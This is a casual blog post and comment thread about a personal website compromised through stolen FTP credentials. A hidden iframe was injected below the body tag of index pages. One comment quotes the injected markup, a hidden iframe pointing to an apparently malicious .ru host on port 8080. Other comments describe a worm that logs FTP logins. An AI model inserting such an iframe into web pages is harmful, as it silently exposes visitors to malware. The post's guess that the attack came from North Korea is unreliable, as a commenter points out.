Home Babes About

Home
Site Related

I Got Hacked.

Hackedmy website was down this morning, so i pinged my buddy ron about it and he jumped right on it — thanks dude! …but it turned out to be a lot more than just the server getting hung up on something and needing a reboot.

when my site here came back online, first thing i noticed was this huge blank space at the top of the page… so naturally i went to view-source on the page, and that’s when i noticed some iframe at the top of the page right under the body tag — i sure as hell didn’t put that there, and nobody else would’ve… uh oh.

to add insult to injury, it looks like a whole bunch of pages had been modified adding in this stupid iframe to the pages, which really fucking blows… so i’ve been going through them and removing it from the pages, which sucks, but not more than the fact that these assholes broke in and ran some hack to do this in the first place — looks like they got in through my FTP account.

g’damnit.

here’s a quick sampling of some of the IP addresses that were hitting the box and were banned this morning:

61.7.213.66
222.143.24.213
222.143.24.213
125.64.16.148
203.162.130.239
203.162.130.239
79.122.217.19
221.4.205.132
221.4.205.132
125.138.96.53
71.15.104.163
59.149.136.101
24.60.34.58

which all seems to be originating from “Asia Pacific Network Information Centre”.

yup, looks like the North Koreans are hacking sites again, least that was my first thought. *blink*

p.s. might want to run some anti-spyware/anti-virus software on your computer if you happened to have hit my site earlier this morning, just in case.

15 Comments

15 Comments

  1. Noticed it was down this morning (UK) with a macromedia message. Did the iframe have a url or anything – any javascript changed?

    No viruses here… well no more than to be expected after a hard morning of watching pr0n!

    Reply

  2. By the way if this sites is targetted, when can we expect foogina.com to roll up?

    Reply

  3. the iframe that was being inserted into my source pages on the server:

    iframe src=”http://q1u.ru:8080/index.php” width=102 height=190 style=”visibility: hidden”

    ——-

    haha @ hard morning of watching pr0n!

    Reply

  4. Yep, could not open your page earlyer today. What a f*ckers to mess around with other peoples sites

    Reply

  5. You must have had it fixed by the time I visited it. Looked the same to me, and I didn’t get any type of virus, though I am on a Mac at the moment. Usually it seems they post a bunch of links in the footer or header, hadn’t seen the iframe hack yet.

    Reply

  6. You wouldn’t be hosted by Media Temple would you? Happened to me on a few client sites I host there the other week – said it was my security (different sites though!?) – heard someone the other day – hosted at MT had the same issue – thinking it may be their security being breached….

    Reply

  7. I had my site’s hit aswell.

    The effect file where the default pages in any ext. from cfml to home.asp and even index.txt, along with all js files.

    Then the script was insert at the end of all js files, then on the default pages it insert js script just below the body tag.

    It took a while to figure this out, but good old google would not let me view my own page via FF, (& GC Safari4, Opera) as it was known to suppling malware. (IE8 did not care).

    Page’s not exposed unless you knew the fancy UUID i had them behind also got hit, so it must be an FTP/OS issue (and proved to be such). I have change all my hosting settings & password. It even pays to have DRP even for your personal website come sandpit! My hosting company also did some huge improvements. Security is as much my job as it is the hosting company.

    When dealing with this I found a lovely way to try lesson attacks from certain url/ip.
    http://www.mvps.org/winhelp2002/hosts.htm I dont know effect this is but it sure got rid of adverts.

    Reply

  8. shit man, it’s everywhere… what the hell is going on, man? unless it happens to me, i’m pretty unaware of this kind of stuff for the most part. kind of freaked me out a little bit there.

    fucking bastards.

    @jonathan: nope, not being hosted on MT, but it seems pretty widespread already… but probably the same security breach or hole being exploited.

    @jetfoo: good stuff man… and that’s exactly what happened, every file with “index” in it got the iframe code inserted right after the BODY tag

    Reply

  9. Don’t let the man get you down, Foo!

    Reply

  10. It’s been happening on my sites for quite a while now. From what I’ve learned, it’s a virus/worm that gets into your system, waits for you to make an FTP connection, reads your login info, and then does it’s injection when you do a reboot or summat. You can change your FTP login info, but then the next time you log-in, it looks like a new site for the virus to log.

    It seems like a poorly crafted virus as well. It appears to try to self-propogate by way of this iframe, but it ends up just tanking your pages. Great coding, fucktards. Run Adaware and a virus scan. Been a real pain in the arse, as I have a minimum of 5 machines that I FTP from and trying to keep up with who’s been cleaned and stays clean is not easy when this thing is hitting all over the place.

    Reply

  11. OSX OSX OSX, Immune Immune Immune :)

    Reply

  12. @anuga: funny, but i don’t even have any anti-virus software on my mac. lol

    @houser: fuck man, that really blows… my ftp passwords been reset, but every time i bring up my site now i half expect to see this huge blank space at the top loading that fucking iframe again. bastards.

    @tulley: hell no… i’ll keep on doing my thing, mang ;)

    Reply

  13. @Anuga = I use mac only so if it is a worm on local machines then mac is not immune! :)

    Reply

  14. @Anuga: That’s funny, because I thought foO switched to OSX. It’s alright go ahead and “insert foot into mouth”.

    Reply

  15. which all seems to be originating from “Asia Pacific Network Information Centre”.

    Yes, foO, you are right. It’s the Chinese. They’re attacking you. And America.

    Or maybe you didn’t read the WHOIS reply (I pasted the one for 61.7.213.66 as it’s displayed on networksolutions.com):

    NetRange: 61.0.0.0 – 61.255.255.255
    CIDR: 61.0.0.0/8
    NetName: APNIC3
    NetHandle: NET-61-0-0-0-1
    Parent:
    NetType: Allocated to APNIC

    It’s an IP address range managed by APNIC. I’m really a bit irritated you don’t know what an RIR is. Anyway, if you go to apnic.net and enter the IP address there, you’ll see that the IP address belongs to an ISP from Thailand.

    Reply

Leave a Reply

Your email address will not be published.